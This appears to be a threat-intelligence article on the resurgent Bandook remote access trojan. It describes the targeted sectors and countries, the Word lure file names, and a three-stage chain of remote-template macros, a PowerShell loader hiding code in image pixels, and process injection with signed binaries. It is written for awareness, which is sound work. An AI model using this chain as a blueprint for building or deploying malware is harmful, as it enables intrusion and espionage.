Like a phoenix rises from the ashes, Bandook has risen after several years. Bandook, written in both Delphi and C++ was first seen in 2007 as a commercially available RAT, developed by a Lebanese individual named PrinceAli.
Over the years, variants of Bandook were leaked on the Web, and the malware became available for public download.
Bandook was last featured in the campaigns, Operation Manul in 2015 and Dark Caracal in 2017. During the past year, dozens of digitally signed variants of the erstwhile famous Bandook began to reappear in the threat landscape.
Government, financial, energy, food industry, healthcare, education, IT and legal institutions are the targeted sectors.
Singapore, Cyprus, Chile, Italy, USA, Turkey, Switzerland, Indonesia and Germany. Not tourist locations, but the targeted countries.
Considering that a wide array of sectors and countries have been targeted, it is suspected that the malware is not developed by a single entity but by an offensive infrastructure and is being sold to governments and threat actors world-wide.
Stages of Infection
The malware chain can be described in about 3 stages as described in the below picture:
Stage 1 – Lure Documents
The targeted Microsoft Word document is consists of an encrypted malicious script data and an external template that points to a document containing malicious VBA macros.
This external template is downloaded via a URL shortening web service and it redirects to another domain which is controlled by the attacker, wherein the VBA code runs automatically, decrypts the embedded data from the original lure document, and drops the decoded data into two files in the local user folder: fmx.ps1 and sdmc.jpg
Sample document file names:
- Malaysia Shipment.docx
- Jakarta Shipment.docx
- malta containers.docx
- Certified documents.docx
- Notarized Documents.docx
- bank statement.docx
- passport and documents.docx
- Case Draft.docx
- documents scan.docx
Stage 2 – Powershell Loader
After the 1st stage, the fmx.ps1 and sdmc.jpg calls in fmx.ps1 which is a short PowerShell script that decodes and executes a base64 encoded PowerShell stored in sdmc.jpg.
Now, the decoded PowerShell script downloads a zip file containing four files from a cloud service such as Dropbox, Bitbucket or an S3 bucket. The zip file is stored in the user’s Public folder, and the four files are locally extracted.
The 3 files a.png, b.png and untitled.png generates the malware payload. untitled.png file is actually a valid image which contains a hidden RC4 function encoded in the RGB values of the pixels, created using a known tool named invoke-PSImage.
Finally, the PowerShell script executes the malware, opens draft.docx, and deletes all previous artifacts from the Public folder.
draft.docx is a benign document that convinces the victim that the document is no longer available and that the overall execution was successful.
The document as seen post infection:
Stage 3 – Bandook Loader
The final payload is a variant of Bandook which starts with a loader to create a new instance of an Internet Explorer process and inject a malicious payload into it. The payload contacts the C&C sever, sends basic information about the infected machine, and waits for additional commands from the server. It is also found that valid Certum certificates were used to sign the Bandook malware executable.
There are three variants that are currently available:
- A full-fledged version with 120 commands (not signed)
- A full-fledged version(single sample) with 120 commands (signed)
- A slimmed-down version with 11 commands ( signed)
This indicates the operators desire to reduce the malware’s footprint and minimize their chances of an undetected campaign against high profile targets, whereas the use of the un-signed 120 command version can be used for low profile targets.
All evidence points to our belief that the mysterious operators behind the malicious infrastructure of “Operation Manul” and “Dark Caracal” are still alive and operational, willing to assist in the offensive cyber operations to anyone who is willing to pay. It is good to take the necessary steps to prevent this at the very first stages.